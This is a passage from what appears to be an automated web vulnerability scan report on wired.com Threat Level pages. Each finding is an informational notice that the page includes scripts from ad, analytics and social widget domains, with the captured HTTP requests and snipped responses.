...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.170. http://www.wired.com/threatlevel/category/tsa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/tsa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/tsa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:38 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=107
Expires: Wed, 12 Jan 2011 15:33:55 GMT
Date: Wed, 12 Jan 2011 15:32:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63575

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.171. http://www.wired.com/threatlevel/category/uncategorized/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/uncategorized/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/uncategorized/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:14:20 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=225
Expires: Wed, 12 Jan 2011 15:34:19 GMT
Date: Wed, 12 Jan 2011 15:30:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.172. http://www.wired.com/threatlevel/category/watchlists/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/watchlists/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/watchlists/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:20:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=52
Expires: Wed, 12 Jan 2011 15:33:09 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.173. http://www.wired.com/threatlevel/category/wikileaks/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/wikileaks/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/wikileaks/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:49:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=304
Expires: Wed, 12 Jan 2011 15:33:17 GMT
Date: Wed, 12 Jan 2011 15:28:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.174. http://www.wired.com/threatlevel/category/yo-ho-ho/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/category/yo-ho-ho/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/category/yo-ho-ho/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:21:18 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=49
Expires: Wed, 12 Jan 2011 15:33:06 GMT
Date: Wed, 12 Jan 2011 15:32:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.175. http://www.wired.com/threatlevel/tag/4chan/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/4chan/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/4chan/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:55 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=43
Expires: Wed, 12 Jan 2011 15:33:33 GMT
Date: Wed, 12 Jan 2011 15:32:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.176. http://www.wired.com/threatlevel/tag/aclu/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/aclu/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/aclu/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:56 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=48
Expires: Wed, 12 Jan 2011 15:33:46 GMT
Date: Wed, 12 Jan 2011 15:32:58 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 120991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.177. http://www.wired.com/threatlevel/tag/al-haramain/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/al-haramain/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/al-haramain/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:25:58 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:03 GMT
Date: Wed, 12 Jan 2011 15:33:02 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 142184

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.178. http://www.wired.com/threatlevel/tag/albert-gonzalez/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/albert-gonzalez/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/albert-gonzalez/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:32:52 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=50
Expires: Wed, 12 Jan 2011 15:33:53 GMT
Date: Wed, 12 Jan 2011 15:33:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 137804

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.179. http://www.wired.com/threatlevel/tag/apple-iphone/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/apple-iphone/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/apple-iphone/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.180. http://www.wired.com/threatlevel/tag/blackhat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/blackhat/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/blackhat/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:44:35 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:34:07 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 119818

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.181. http://www.wired.com/threatlevel/tag/bradley-manning/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/bradley-manning/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/bradley-manning/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 13:06:25 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=62
Expires: Wed, 12 Jan 2011 15:34:08 GMT
Date: Wed, 12 Jan 2011 15:33:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132068

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.182. http://www.wired.com/threatlevel/tag/carding/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/carding/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/carding/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:00 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=54
Expires: Wed, 12 Jan 2011 15:34:05 GMT
Date: Wed, 12 Jan 2011 15:33:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

